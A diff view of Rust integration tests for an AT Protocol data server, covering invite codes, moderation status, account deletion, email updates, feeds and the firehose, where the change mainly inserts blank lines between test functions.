async fn test_disable_invite_codes_by_code() {
199
let client = client();
···
242
assert!(disabled_code.is_some());
243
assert_eq!(disabled_code.unwrap()["disabled"], true);
244
}
245
#[tokio::test]
246
async fn test_disable_invite_codes_by_account() {
247
let client = client();
···
289
assert_eq!(code["disabled"], true);
290
}
291
}
292
#[tokio::test]
293
async fn test_disable_invite_codes_no_auth() {
294
let client = client();
···
306
.expect("Failed to send request");
307
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
308
}
309
#[tokio::test]
310
async fn test_admin_enable_account_invites_not_found() {
311
let client = client();
···
1
mod common;
2
+
3
use common::*;
4
use reqwest::StatusCode;
5
use serde_json::{Value, json};
6
+
7
#[tokio::test]
8
async fn test_admin_get_invite_codes_success() {
9
let client = client();
···
34
let body: Value = res.json().await.expect("Response was not valid JSON");
35
assert!(body["codes"].is_array());
36
}
37
+
38
#[tokio::test]
39
async fn test_admin_get_invite_codes_with_limit() {
40
let client = client();
···
68
let codes = body["codes"].as_array().unwrap();
69
assert!(codes.len() <= 2);
70
}
71
+
72
#[tokio::test]
73
async fn test_admin_get_invite_codes_no_auth() {
74
let client = client();
···
82
.expect("Failed to send request");
83
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
84
}
85
+
86
#[tokio::test]
87
async fn test_disable_account_invites_success() {
88
let client = client();
···
118
let body: Value = res.json().await.expect("Response was not valid JSON");
119
assert_eq!(body["error"], "InvitesDisabled");
120
}
121
+
122
#[tokio::test]
123
async fn test_enable_account_invites_success() {
124
let client = client();
···
164
.expect("Failed to send request");
165
assert_eq!(res.status(), StatusCode::OK);
166
}
167
+
168
#[tokio::test]
169
async fn test_disable_account_invites_no_auth() {
170
let client = client();
···
182
.expect("Failed to send request");
183
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
184
}
185
+
186
#[tokio::test]
187
async fn test_disable_account_invites_not_found() {
188
let client = client();
···
202
.expect("Failed to send request");
203
assert_eq!(res.status(), StatusCode::NOT_FOUND);
204
}
205
+
206
#[tokio::test]
207
async fn test_disable_invite_codes_by_code() {
208
let client = client();
···
251
assert!(disabled_code.is_some());
252
assert_eq!(disabled_code.unwrap()["disabled"], true);
253
}
254
+
255
#[tokio::test]
256
async fn test_disable_invite_codes_by_account() {
257
let client = client();
···
299
assert_eq!(code["disabled"], true);
300
}
301
}
302
+
303
#[tokio::test]
304
async fn test_disable_invite_codes_no_auth() {
305
let client = client();
···
317
.expect("Failed to send request");
318
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
319
}
320
+
321
#[tokio::test]
322
async fn test_admin_enable_account_invites_not_found() {
323
let client = client();
+10
tests/admin_moderation.rs
+10
tests/admin_moderation.rs
···
1
mod common;
2
use common::*;
3
use reqwest::StatusCode;
4
use serde_json::{Value, json};
5
#[tokio::test]
6
async fn test_get_subject_status_user_success() {
7
let client = client();
···
22
assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef");
23
assert_eq!(body["subject"]["did"], did);
24
}
25
#[tokio::test]
26
async fn test_get_subject_status_not_found() {
27
let client = client();
···
40
let body: Value = res.json().await.expect("Response was not valid JSON");
41
assert_eq!(body["error"], "SubjectNotFound");
42
}
43
#[tokio::test]
44
async fn test_get_subject_status_no_param() {
45
let client = client();
···
57
let body: Value = res.json().await.expect("Response was not valid JSON");
58
assert_eq!(body["error"], "InvalidRequest");
59
}
60
#[tokio::test]
61
async fn test_get_subject_status_no_auth() {
62
let client = client();
···
71
.expect("Failed to send request");
72
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
73
}
74
#[tokio::test]
75
async fn test_update_subject_status_takedown_user() {
76
let client = client();
···
115
assert_eq!(status_body["takedown"]["applied"], true);
116
assert_eq!(status_body["takedown"]["ref"], "mod-action-123");
117
}
118
#[tokio::test]
119
async fn test_update_subject_status_remove_takedown() {
120
let client = client();
···
171
let status_body: Value = status_res.json().await.unwrap();
172
assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false));
173
}
174
#[tokio::test]
175
async fn test_update_subject_status_deactivate_user() {
176
let client = client();
···
209
assert!(status_body["deactivated"].is_object());
210
assert_eq!(status_body["deactivated"]["applied"], true);
211
}
212
#[tokio::test]
213
async fn test_update_subject_status_invalid_type() {
214
let client = client();
···
236
let body: Value = res.json().await.expect("Response was not valid JSON");
237
assert_eq!(body["error"], "InvalidRequest");
238
}
239
#[tokio::test]
240
async fn test_update_subject_status_no_auth() {
241
let client = client();
···
1
mod common;
2
+
3
use common::*;
4
use reqwest::StatusCode;
5
use serde_json::{Value, json};
6
+
7
#[tokio::test]
8
async fn test_get_subject_status_user_success() {
9
let client = client();
···
24
assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef");
25
assert_eq!(body["subject"]["did"], did);
26
}
27
+
28
#[tokio::test]
29
async fn test_get_subject_status_not_found() {
30
let client = client();
···
43
let body: Value = res.json().await.expect("Response was not valid JSON");
44
assert_eq!(body["error"], "SubjectNotFound");
45
}
46
+
47
#[tokio::test]
48
async fn test_get_subject_status_no_param() {
49
let client = client();
···
61
let body: Value = res.json().await.expect("Response was not valid JSON");
62
assert_eq!(body["error"], "InvalidRequest");
63
}
64
+
65
#[tokio::test]
66
async fn test_get_subject_status_no_auth() {
67
let client = client();
···
76
.expect("Failed to send request");
77
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
78
}
79
+
80
#[tokio::test]
81
async fn test_update_subject_status_takedown_user() {
82
let client = client();
···
121
assert_eq!(status_body["takedown"]["applied"], true);
122
assert_eq!(status_body["takedown"]["ref"], "mod-action-123");
123
}
124
+
125
#[tokio::test]
126
async fn test_update_subject_status_remove_takedown() {
127
let client = client();
···
178
let status_body: Value = status_res.json().await.unwrap();
179
assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false));
180
}
181
+
182
#[tokio::test]
183
async fn test_update_subject_status_deactivate_user() {
184
let client = client();
···
217
assert!(status_body["deactivated"].is_object());
218
assert_eq!(status_body["deactivated"]["applied"], true);
219
}
220
+
221
#[tokio::test]
222
async fn test_update_subject_status_invalid_type() {
223
let client = client();
···
245
let body: Value = res.json().await.expect("Response was not valid JSON");
246
assert_eq!(body["error"], "InvalidRequest");
247
}
248
+
249
#[tokio::test]
250
async fn test_update_subject_status_no_auth() {
251
let client = client();
+6
tests/appview_integration.rs
+6
tests/appview_integration.rs
···
1
mod common;
2
use common::{base_url, client, create_account_and_login};
3
use reqwest::StatusCode;
4
use serde_json::{json, Value};
5
#[tokio::test]
6
async fn test_get_author_feed_returns_appview_data() {
7
let client = client();
···
27
"Post text should match appview response"
28
);
29
}
30
#[tokio::test]
31
async fn test_get_actor_likes_returns_appview_data() {
32
let client = client();
···
52
"Post text should match appview response"
53
);
54
}
55
#[tokio::test]
56
async fn test_get_post_thread_returns_appview_data() {
57
let client = client();
···
80
"Post text should match appview response"
81
);
82
}
83
#[tokio::test]
84
async fn test_get_feed_returns_appview_data() {
85
let client = client();
···
105
"Post text should match appview response"
106
);
107
}
108
#[tokio::test]
109
async fn test_register_push_proxies_to_appview() {
110
let client = client();
···
1
mod common;
2
+
3
use common::{base_url, client, create_account_and_login};
4
use reqwest::StatusCode;
5
use serde_json::{json, Value};
6
+
7
#[tokio::test]
8
async fn test_get_author_feed_returns_appview_data() {
9
let client = client();
···
29
"Post text should match appview response"
30
);
31
}
32
+
33
#[tokio::test]
34
async fn test_get_actor_likes_returns_appview_data() {
35
let client = client();
···
55
"Post text should match appview response"
56
);
57
}
58
+
59
#[tokio::test]
60
async fn test_get_post_thread_returns_appview_data() {
61
let client = client();
···
84
"Post text should match appview response"
85
);
86
}
87
+
88
#[tokio::test]
89
async fn test_get_feed_returns_appview_data() {
90
let client = client();
···
110
"Post text should match appview response"
111
);
112
}
113
+
114
#[tokio::test]
115
async fn test_register_push_proxies_to_appview() {
116
let client = client();
+17
tests/common/mod.rs
+17
tests/common/mod.rs
···
14
use tokio::net::TcpListener;
15
use wiremock::matchers::{method, path};
16
use wiremock::{Mock, MockServer, ResponseTemplate};
17
static SERVER_URL: OnceLock<String> = OnceLock::new();
18
static APP_PORT: OnceLock<u16> = OnceLock::new();
19
static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new();
20
#[cfg(not(feature = "external-infra"))]
21
use testcontainers::core::ContainerPort;
22
#[cfg(not(feature = "external-infra"))]
···
27
static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new();
28
#[cfg(not(feature = "external-infra"))]
29
static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new();
30
#[allow(dead_code)]
31
pub const AUTH_TOKEN: &str = "test-token";
32
#[allow(dead_code)]
···
35
pub const AUTH_DID: &str = "did:plc:fake";
36
#[allow(dead_code)]
37
pub const TARGET_DID: &str = "did:plc:target";
38
fn has_external_infra() -> bool {
39
std::env::var("BSPDS_TEST_INFRA_READY").is_ok()
40
|| (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok())
···
54
.args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"])
55
.output();
56
}
57
#[allow(dead_code)]
58
pub fn client() -> Client {
59
Client::new()
60
}
61
#[allow(dead_code)]
62
pub fn app_port() -> u16 {
63
*APP_PORT.get().expect("APP_PORT not initialized")
64
}
65
pub async fn base_url() -> &'static str {
66
SERVER_URL.get_or_init(|| {
67
let (tx, rx) = std::sync::mpsc::channel();
···
94
rx.recv().expect("Failed to start test server")
95
})
96
}
97
async fn setup_with_external_infra() -> String {
98
let database_url = std::env::var("DATABASE_URL")
99
.expect("DATABASE_URL must be set when using external infra");
···
114
MOCK_APPVIEW.set(mock_server).ok();
115
spawn_app(database_url).await
116
}
117
#[cfg(not(feature = "external-infra"))]
118
async fn setup_with_testcontainers() -> String {
119
let s3_container = GenericImage::new("minio/minio", "latest")
···
177
DB_CONTAINER.set(container).ok();
178
spawn_app(connection_string).await
179
}
180
#[cfg(feature = "external-infra")]
181
async fn setup_with_testcontainers() -> String {
182
panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT.");
183
}
184
async fn setup_mock_appview(mock_server: &MockServer) {
185
Mock::given(method("GET"))
186
.and(path("/xrpc/app.bsky.actor.getProfile"))
···
310
.mount(mock_server)
311
.await;
312
}
313
async fn spawn_app(database_url: String) -> String {
314
use bspds::rate_limit::RateLimiters;
315
let pool = PgPoolOptions::new()
···
342
});
343
format!("http://{}", addr)
344
}
345
#[allow(dead_code)]
346
pub async fn get_db_connection_string() -> String {
347
base_url().await;
···
360
}
361
}
362
}
363
#[allow(dead_code)]
364
pub async fn verify_new_account(client: &Client, did: &str) -> String {
365
let conn_str = get_db_connection_string().await;
···
396
.expect("No accessJwt in confirmSignup response")
397
.to_string()
398
}
399
#[allow(dead_code)]
400
pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value {
401
let res = client
···
413
let body: Value = res.json().await.expect("Blob upload response was not JSON");
414
body["blob"].clone()
415
}
416
#[allow(dead_code)]
417
pub async fn create_test_post(
418
client: &Client,
···
463
.to_string();
464
(uri, cid, rkey)
465
}
466
#[allow(dead_code)]
467
pub async fn create_account_and_login(client: &Client) -> (String, String) {
468
let mut last_error = String::new();
···
14
use tokio::net::TcpListener;
15
use wiremock::matchers::{method, path};
16
use wiremock::{Mock, MockServer, ResponseTemplate};
17
+
18
static SERVER_URL: OnceLock<String> = OnceLock::new();
19
static APP_PORT: OnceLock<u16> = OnceLock::new();
20
static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new();
21
+
22
#[cfg(not(feature = "external-infra"))]
23
use testcontainers::core::ContainerPort;
24
#[cfg(not(feature = "external-infra"))]
···
29
static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new();
30
#[cfg(not(feature = "external-infra"))]
31
static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new();
32
+
33
#[allow(dead_code)]
34
pub const AUTH_TOKEN: &str = "test-token";
35
#[allow(dead_code)]
···
38
pub const AUTH_DID: &str = "did:plc:fake";
39
#[allow(dead_code)]
40
pub const TARGET_DID: &str = "did:plc:target";
41
+
42
fn has_external_infra() -> bool {
43
std::env::var("BSPDS_TEST_INFRA_READY").is_ok()
44
|| (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok())
···
58
.args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"])
59
.output();
60
}
61
+
62
#[allow(dead_code)]
63
pub fn client() -> Client {
64
Client::new()
65
}
66
+
67
#[allow(dead_code)]
68
pub fn app_port() -> u16 {
69
*APP_PORT.get().expect("APP_PORT not initialized")
70
}
71
+
72
pub async fn base_url() -> &'static str {
73
SERVER_URL.get_or_init(|| {
74
let (tx, rx) = std::sync::mpsc::channel();
···
101
rx.recv().expect("Failed to start test server")
102
})
103
}
104
+
105
async fn setup_with_external_infra() -> String {
106
let database_url = std::env::var("DATABASE_URL")
107
.expect("DATABASE_URL must be set when using external infra");
···
122
MOCK_APPVIEW.set(mock_server).ok();
123
spawn_app(database_url).await
124
}
125
+
126
#[cfg(not(feature = "external-infra"))]
127
async fn setup_with_testcontainers() -> String {
128
let s3_container = GenericImage::new("minio/minio", "latest")
···
186
DB_CONTAINER.set(container).ok();
187
spawn_app(connection_string).await
188
}
189
+
190
#[cfg(feature = "external-infra")]
191
async fn setup_with_testcontainers() -> String {
192
panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT.");
193
}
194
+
195
async fn setup_mock_appview(mock_server: &MockServer) {
196
Mock::given(method("GET"))
197
.and(path("/xrpc/app.bsky.actor.getProfile"))
···
321
.mount(mock_server)
322
.await;
323
}
324
+
325
async fn spawn_app(database_url: String) -> String {
326
use bspds::rate_limit::RateLimiters;
327
let pool = PgPoolOptions::new()
···
354
});
355
format!("http://{}", addr)
356
}
357
+
358
#[allow(dead_code)]
359
pub async fn get_db_connection_string() -> String {
360
base_url().await;
···
373
}
374
}
375
}
376
+
377
#[allow(dead_code)]
378
pub async fn verify_new_account(client: &Client, did: &str) -> String {
379
let conn_str = get_db_connection_string().await;
···
410
.expect("No accessJwt in confirmSignup response")
411
.to_string()
412
}
413
+
414
#[allow(dead_code)]
415
pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value {
416
let res = client
···
428
let body: Value = res.json().await.expect("Blob upload response was not JSON");
429
body["blob"].clone()
430
}
431
+
432
#[allow(dead_code)]
433
pub async fn create_test_post(
434
client: &Client,
···
479
.to_string();
480
(uri, cid, rkey)
481
}
482
+
483
#[allow(dead_code)]
484
pub async fn create_account_and_login(client: &Client) -> (String, String) {
485
let mut last_error = String::new();
+10
tests/delete_account.rs
+10
tests/delete_account.rs
···
5
use reqwest::StatusCode;
6
use serde_json::{Value, json};
7
use sqlx::PgPool;
8
async fn get_pool() -> PgPool {
9
let conn_str = get_db_connection_string().await;
10
sqlx::postgres::PgPoolOptions::new()
···
13
.await
14
.expect("Failed to connect to test database")
15
}
16
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) {
17
let res = client
18
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
30
let jwt = verify_new_account(client, &did).await;
31
(did, jwt)
32
}
33
#[tokio::test]
34
async fn test_delete_account_full_flow() {
35
let client = client();
···
86
.expect("Failed to check session");
87
assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED);
88
}
89
#[tokio::test]
90
async fn test_delete_account_wrong_password() {
91
let client = client();
···
129
let body: Value = delete_res.json().await.unwrap();
130
assert_eq!(body["error"], "AuthenticationFailed");
131
}
132
#[tokio::test]
133
async fn test_delete_account_invalid_token() {
134
let client = client();
···
171
let body: Value = delete_res.json().await.unwrap();
172
assert_eq!(body["error"], "InvalidToken");
173
}
174
#[tokio::test]
175
async fn test_delete_account_expired_token() {
176
let client = client();
···
221
let body: Value = delete_res.json().await.unwrap();
222
assert_eq!(body["error"], "ExpiredToken");
223
}
224
#[tokio::test]
225
async fn test_delete_account_token_mismatch() {
226
let client = client();
···
268
let body: Value = delete_res.json().await.unwrap();
269
assert_eq!(body["error"], "InvalidToken");
270
}
271
#[tokio::test]
272
async fn test_delete_account_with_app_password() {
273
let client = client();
···
327
.expect("Failed to query user");
328
assert!(user_row.is_none(), "User should be deleted from database");
329
}
330
#[tokio::test]
331
async fn test_delete_account_missing_fields() {
332
let client = client();
···
371
.expect("Failed to send request");
372
assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY);
373
}
374
#[tokio::test]
375
async fn test_delete_account_nonexistent_user() {
376
let client = client();
···
5
use reqwest::StatusCode;
6
use serde_json::{Value, json};
7
use sqlx::PgPool;
8
+
9
async fn get_pool() -> PgPool {
10
let conn_str = get_db_connection_string().await;
11
sqlx::postgres::PgPoolOptions::new()
···
14
.await
15
.expect("Failed to connect to test database")
16
}
17
+
18
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) {
19
let res = client
20
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
32
let jwt = verify_new_account(client, &did).await;
33
(did, jwt)
34
}
35
+
36
#[tokio::test]
37
async fn test_delete_account_full_flow() {
38
let client = client();
···
89
.expect("Failed to check session");
90
assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED);
91
}
92
+
93
#[tokio::test]
94
async fn test_delete_account_wrong_password() {
95
let client = client();
···
133
let body: Value = delete_res.json().await.unwrap();
134
assert_eq!(body["error"], "AuthenticationFailed");
135
}
136
+
137
#[tokio::test]
138
async fn test_delete_account_invalid_token() {
139
let client = client();
···
176
let body: Value = delete_res.json().await.unwrap();
177
assert_eq!(body["error"], "InvalidToken");
178
}
179
+
180
#[tokio::test]
181
async fn test_delete_account_expired_token() {
182
let client = client();
···
227
let body: Value = delete_res.json().await.unwrap();
228
assert_eq!(body["error"], "ExpiredToken");
229
}
230
+
231
#[tokio::test]
232
async fn test_delete_account_token_mismatch() {
233
let client = client();
···
275
let body: Value = delete_res.json().await.unwrap();
276
assert_eq!(body["error"], "InvalidToken");
277
}
278
+
279
#[tokio::test]
280
async fn test_delete_account_with_app_password() {
281
let client = client();
···
335
.expect("Failed to query user");
336
assert!(user_row.is_none(), "User should be deleted from database");
337
}
338
+
339
#[tokio::test]
340
async fn test_delete_account_missing_fields() {
341
let client = client();
···
380
.expect("Failed to send request");
381
assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY);
382
}
383
+
384
#[tokio::test]
385
async fn test_delete_account_nonexistent_user() {
386
let client = client();
+14
tests/email_update.rs
+14
tests/email_update.rs
···
2
use reqwest::StatusCode;
3
use serde_json::{json, Value};
4
use sqlx::PgPool;
5
async fn get_pool() -> PgPool {
6
let conn_str = common::get_db_connection_string().await;
7
sqlx::postgres::PgPoolOptions::new()
···
10
.await
11
.expect("Failed to connect to test database")
12
}
13
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String {
14
let res = client
15
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
26
let did = body["did"].as_str().expect("No did");
27
common::verify_new_account(client, did).await
28
}
29
#[tokio::test]
30
async fn test_email_update_flow_success() {
31
let client = common::client();
···
77
assert!(user.email_pending_verification.is_none());
78
assert!(user.email_confirmation_code.is_none());
79
}
80
#[tokio::test]
81
async fn test_request_email_update_taken_email() {
82
let client = common::client();
···
98
let body: Value = res.json().await.expect("Invalid JSON");
99
assert_eq!(body["error"], "EmailTaken");
100
}
101
#[tokio::test]
102
async fn test_confirm_email_invalid_token() {
103
let client = common::client();
···
128
let body: Value = res.json().await.expect("Invalid JSON");
129
assert_eq!(body["error"], "InvalidToken");
130
}
131
#[tokio::test]
132
async fn test_confirm_email_wrong_email() {
133
let client = common::client();
···
164
let body: Value = res.json().await.expect("Invalid JSON");
165
assert_eq!(body["message"], "Email does not match pending update");
166
}
167
#[tokio::test]
168
async fn test_update_email_success_no_token_required() {
169
let client = common::client();
···
187
.expect("User not found");
188
assert_eq!(user.email, Some(new_email));
189
}
190
#[tokio::test]
191
async fn test_update_email_same_email_noop() {
192
let client = common::client();
···
203
.expect("Failed to update email");
204
assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op");
205
}
206
#[tokio::test]
207
async fn test_update_email_requires_token_after_pending() {
208
let client = common::client();
···
230
let body: Value = res.json().await.expect("Invalid JSON");
231
assert_eq!(body["error"], "TokenRequired");
232
}
233
#[tokio::test]
234
async fn test_update_email_with_valid_token() {
235
let client = common::client();
···
273
assert_eq!(user.email, Some(new_email));
274
assert!(user.email_pending_verification.is_none());
275
}
276
#[tokio::test]
277
async fn test_update_email_invalid_token() {
278
let client = common::client();
···
303
let body: Value = res.json().await.expect("Invalid JSON");
304
assert_eq!(body["error"], "InvalidToken");
305
}
306
#[tokio::test]
307
async fn test_update_email_already_taken() {
308
let client = common::client();
···
324
let body: Value = res.json().await.expect("Invalid JSON");
325
assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest");
326
}
327
#[tokio::test]
328
async fn test_update_email_no_auth() {
329
let client = common::client();
···
338
let body: Value = res.json().await.expect("Invalid JSON");
339
assert_eq!(body["error"], "AuthenticationRequired");
340
}
341
#[tokio::test]
342
async fn test_update_email_invalid_format() {
343
let client = common::client();
···
2
use reqwest::StatusCode;
3
use serde_json::{json, Value};
4
use sqlx::PgPool;
5
+
6
async fn get_pool() -> PgPool {
7
let conn_str = common::get_db_connection_string().await;
8
sqlx::postgres::PgPoolOptions::new()
···
11
.await
12
.expect("Failed to connect to test database")
13
}
14
+
15
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String {
16
let res = client
17
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
28
let did = body["did"].as_str().expect("No did");
29
common::verify_new_account(client, did).await
30
}
31
+
32
#[tokio::test]
33
async fn test_email_update_flow_success() {
34
let client = common::client();
···
80
assert!(user.email_pending_verification.is_none());
81
assert!(user.email_confirmation_code.is_none());
82
}
83
+
84
#[tokio::test]
85
async fn test_request_email_update_taken_email() {
86
let client = common::client();
···
102
let body: Value = res.json().await.expect("Invalid JSON");
103
assert_eq!(body["error"], "EmailTaken");
104
}
105
+
106
#[tokio::test]
107
async fn test_confirm_email_invalid_token() {
108
let client = common::client();
···
133
let body: Value = res.json().await.expect("Invalid JSON");
134
assert_eq!(body["error"], "InvalidToken");
135
}
136
+
137
#[tokio::test]
138
async fn test_confirm_email_wrong_email() {
139
let client = common::client();
···
170
let body: Value = res.json().await.expect("Invalid JSON");
171
assert_eq!(body["message"], "Email does not match pending update");
172
}
173
+
174
#[tokio::test]
175
async fn test_update_email_success_no_token_required() {
176
let client = common::client();
···
194
.expect("User not found");
195
assert_eq!(user.email, Some(new_email));
196
}
197
+
198
#[tokio::test]
199
async fn test_update_email_same_email_noop() {
200
let client = common::client();
···
211
.expect("Failed to update email");
212
assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op");
213
}
214
+
215
#[tokio::test]
216
async fn test_update_email_requires_token_after_pending() {
217
let client = common::client();
···
239
let body: Value = res.json().await.expect("Invalid JSON");
240
assert_eq!(body["error"], "TokenRequired");
241
}
242
+
243
#[tokio::test]
244
async fn test_update_email_with_valid_token() {
245
let client = common::client();
···
283
assert_eq!(user.email, Some(new_email));
284
assert!(user.email_pending_verification.is_none());
285
}
286
+
287
#[tokio::test]
288
async fn test_update_email_invalid_token() {
289
let client = common::client();
···
314
let body: Value = res.json().await.expect("Invalid JSON");
315
assert_eq!(body["error"], "InvalidToken");
316
}
317
+
318
#[tokio::test]
319
async fn test_update_email_already_taken() {
320
let client = common::client();
···
336
let body: Value = res.json().await.expect("Invalid JSON");
337
assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest");
338
}
339
+
340
#[tokio::test]
341
async fn test_update_email_no_auth() {
342
let client = common::client();
···
351
let body: Value = res.json().await.expect("Invalid JSON");
352
assert_eq!(body["error"], "AuthenticationRequired");
353
}
354
+
355
#[tokio::test]
356
async fn test_update_email_invalid_format() {
357
let client = common::client();
+7
tests/feed.rs
+7
tests/feed.rs
···
1
mod common;
2
use common::{base_url, client, create_account_and_login};
3
use serde_json::json;
4
#[tokio::test]
5
async fn test_get_timeline_requires_auth() {
6
let client = client();
···
12
.unwrap();
13
assert_eq!(res.status(), 401);
14
}
15
#[tokio::test]
16
async fn test_get_author_feed_requires_actor() {
17
let client = client();
···
25
.unwrap();
26
assert_eq!(res.status(), 400);
27
}
28
#[tokio::test]
29
async fn test_get_actor_likes_requires_actor() {
30
let client = client();
···
38
.unwrap();
39
assert_eq!(res.status(), 400);
40
}
41
#[tokio::test]
42
async fn test_get_post_thread_requires_uri() {
43
let client = client();
···
51
.unwrap();
52
assert_eq!(res.status(), 400);
53
}
54
#[tokio::test]
55
async fn test_get_feed_requires_auth() {
56
let client = client();
···
65
.unwrap();
66
assert_eq!(res.status(), 401);
67
}
68
#[tokio::test]
69
async fn test_get_feed_requires_feed_param() {
70
let client = client();
···
78
.unwrap();
79
assert_eq!(res.status(), 400);
80
}
81
#[tokio::test]
82
async fn test_register_push_requires_auth() {
83
let client = client();
···
1
mod common;
2
use common::{base_url, client, create_account_and_login};
3
use serde_json::json;
4
+
5
#[tokio::test]
6
async fn test_get_timeline_requires_auth() {
7
let client = client();
···
13
.unwrap();
14
assert_eq!(res.status(), 401);
15
}
16
+
17
#[tokio::test]
18
async fn test_get_author_feed_requires_actor() {
19
let client = client();
···
27
.unwrap();
28
assert_eq!(res.status(), 400);
29
}
30
+
31
#[tokio::test]
32
async fn test_get_actor_likes_requires_actor() {
33
let client = client();
···
41
.unwrap();
42
assert_eq!(res.status(), 400);
43
}
44
+
45
#[tokio::test]
46
async fn test_get_post_thread_requires_uri() {
47
let client = client();
···
55
.unwrap();
56
assert_eq!(res.status(), 400);
57
}
58
+
59
#[tokio::test]
60
async fn test_get_feed_requires_auth() {
61
let client = client();
···
70
.unwrap();
71
assert_eq!(res.status(), 401);
72
}
73
+
74
#[tokio::test]
75
async fn test_get_feed_requires_feed_param() {
76
let client = client();
···
84
.unwrap();
85
assert_eq!(res.status(), 400);
86
}
87
+
88
#[tokio::test]
89
async fn test_register_push_requires_auth() {
90
let client = client();
+6
tests/firehose.rs
+6
tests/firehose.rs
···
8
use serde_json::{json, Value};
9
use std::io::Cursor;
10
use tokio_tungstenite::{connect_async, tungstenite};
11
#[derive(Debug, Deserialize)]
12
struct FrameHeader {
13
op: i64,
14
t: String,
15
}
16
#[derive(Debug, Deserialize)]
17
struct CommitFrame {
18
seq: i64,
···
29
blobs: Vec<Cid>,
30
time: String,
31
}
32
#[derive(Debug, Deserialize)]
33
struct RepoOp {
34
action: String,
35
path: String,
36
cid: Option<Cid>,
37
}
38
fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> {
39
let mut pos = 0;
40
fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> {
···
104
skip_value(bytes, &mut pos)?;
105
Ok(pos)
106
}
107
fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> {
108
let header_len = find_cbor_map_end(bytes)?;
109
let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len])
···
113
.map_err(|e| format!("Failed to parse commit frame: {:?}", e))?;
114
Ok((header, frame))
115
}
116
#[tokio::test]
117
async fn test_firehose_subscription() {
118
let client = client();
···
8
use serde_json::{json, Value};
9
use std::io::Cursor;
10
use tokio_tungstenite::{connect_async, tungstenite};
11
+
12
#[derive(Debug, Deserialize)]
13
struct FrameHeader {
14
op: i64,
15
t: String,
16
}
17
+
18
#[derive(Debug, Deserialize)]
19
struct CommitFrame {
20
seq: i64,
···
31
blobs: Vec<Cid>,
32
time: String,
33
}
34
+
35
#[derive(Debug, Deserialize)]
36
struct RepoOp {
37
action: String,
38
path: String,
39
cid: Option<Cid>,
40
}
41
+
42
fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> {
43
let mut pos = 0;
44
fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> {
···
108
skip_value(bytes, &mut pos)?;
109
Ok(pos)
110
}
111
+
112
fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> {
113
let header_len = find_cbor_map_end(bytes)?;
114
let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len])
···
118
.map_err(|e| format!("Failed to parse commit frame: {:?}", e))?;
119
Ok((header, frame))
120
}
121
+
122
#[tokio::test]
123
async fn test_firehose_subscription() {
124
let client = client();
+1
-1
tests/firehose_validation.rs
+1
-1
tests/firehose_validation.rs
+6
tests/helpers/mod.rs
+6
tests/helpers/mod.rs
···
1
use chrono::Utc;
2
use reqwest::StatusCode;
3
use serde_json::{Value, json};
4
pub use crate::common::*;
5
#[allow(dead_code)]
6
pub async fn setup_new_user(handle_prefix: &str) -> (String, String) {
7
let client = client();
···
40
let new_jwt = verify_new_account(&client, &new_did).await;
41
(new_did, new_jwt)
42
}
43
#[allow(dead_code)]
44
pub async fn create_post(
45
client: &reqwest::Client,
···
83
let cid = create_body["cid"].as_str().unwrap().to_string();
84
(uri, cid)
85
}
86
#[allow(dead_code)]
87
pub async fn create_follow(
88
client: &reqwest::Client,
···
126
let cid = create_body["cid"].as_str().unwrap().to_string();
127
(uri, cid)
128
}
129
#[allow(dead_code)]
130
pub async fn create_like(
131
client: &reqwest::Client,
···
167
body["cid"].as_str().unwrap().to_string(),
168
)
169
}
170
#[allow(dead_code)]
171
pub async fn create_repost(
172
client: &reqwest::Client,
